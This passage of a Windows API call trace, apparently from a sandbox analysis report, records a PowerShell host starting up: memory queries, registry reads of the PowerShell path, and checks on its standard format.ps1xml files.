	[0111.302] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.303] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.303] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.303] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.303] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.304] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.304] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.305] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.306] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.307] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.308] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.308] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.309] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.310] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.310] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.310] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.311] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.311] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.311] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.312] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.312] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.315] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.318] VirtualQuery (in: lpAddress=0xcbf40, lpBuffer=0xcce00, dwLength=0x30 | out: lpBuffer=0xcce00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.319] VirtualQuery (in: lpAddress=0xcbf40, lpBuffer=0xcce00, dwLength=0x30 | out: lpBuffer=0xcce00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.319] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.321] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.340] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.340] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.341] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.345] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0111.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0111.345] CoTaskMemFree (pv=0x1b8470b0) 
	[0111.347] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.358] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.359] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.359] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.360] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.360] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.361] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.363] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.364] VirtualQuery (in: lpAddress=0xcbf30, lpBuffer=0xccdf0, dwLength=0x30 | out: lpBuffer=0xccdf0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.364] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3e8 | out: phkResult=0xcd3e8*=0x334) returned 0x0
	[0111.365] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd3fc, lpData=0x0, lpcbData=0xcd3f8*=0x0 | out: lpType=0xcd3fc*=0x1, lpData=0x0, lpcbData=0xcd3f8*=0x74) returned 0x0
	[0111.365] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd36c, lpData=0x0, lpcbData=0xcd368*=0x0 | out: lpType=0xcd36c*=0x1, lpData=0x0, lpcbData=0xcd368*=0x74) returned 0x0
	[0111.365] CoTaskMemAlloc (cb=0x78) returned 0x1c9b30
	[0111.365] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xcd33c, lpData=0x1c9b30, lpcbData=0xcd338*=0x74 | out: lpType=0xcd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd338*=0x74) returned 0x0
	[0111.365] CoTaskMemFree (pv=0x1c9b30) 
	[0111.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0111.365] SetErrorMode (uMode=0x1) returned 0x1
	[0111.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0111.365] SetErrorMode (uMode=0x1) returned 0x1
	[0111.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.366] SetErrorMode (uMode=0x1) returned 0x1
	[0111.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0111.366] SetErrorMode (uMode=0x1) returned 0x1
	[0111.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.366] SetErrorMode (uMode=0x1) returned 0x1
	[0111.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0111.367] SetErrorMode (uMode=0x1) returned 0x1
	[0111.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.367] SetErrorMode (uMode=0x1) returned 0x1
	[0111.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0111.367] SetErrorMode (uMode=0x1) returned 0x1
	[0111.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.367] SetErrorMode (uMode=0x1) returned 0x1
	[0111.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0111.367] SetErrorMode (uMode=0x1) returned 0x1
	[0111.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0111.368] SetErrorMode (uMode=0x1) returned 0x1
	[0111.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0111.368] SetErrorMode (uMode=0x1) returned 0x1
	[0111.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.368] SetErrorMode (uMode=0x1) returned 0x1
	[0111.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0111.368] SetErrorMode (uMode=0x1) returned 0x1
	[0111.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0111.369] SetErrorMode (uMode=0x1) returned 0x1
	[0111.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0111.369] SetErrorMode (uMode=0x1) returned 0x1
	[0111.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0111.374] SetErrorMode (uMode=0x1) returned 0x1
	[0111.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0111.375] SetErrorMode (uMode=0x1) returned 0x1
	[0111.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0111.376] SetErrorMode (uMode=0x1) returned 0x1
	[0111.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2c0 | out: lpFileInformation=0xcd2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0111.376] SetErrorMode (uMode=0x1) returned 0x1
	[0111.377] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0111.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0111.377] CoTaskMemFree (pv=0x1b8470b0) 
	[0111.379] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0111.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0111.379] CoTaskMemFree (pv=0x1b8470b0) 
	[0111.379] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0111.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0111.380] CoTaskMemFree (pv=0x1b8470b0) 
	[0111.380] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0111.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0111.380] CoTaskMemFree (pv=0x1b8470b0) 
	[0111.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.380] SetErrorMode (uMode=0x1) returned 0x1
	[0111.380] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.380] GetFileType (hFile=0x330) returned 0x1
	[0111.380] SetErrorMode (uMode=0x1) returned 0x1
	[0111.381] GetFileType (hFile=0x330) returned 0x1
	[0111.381] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.382] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.382] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
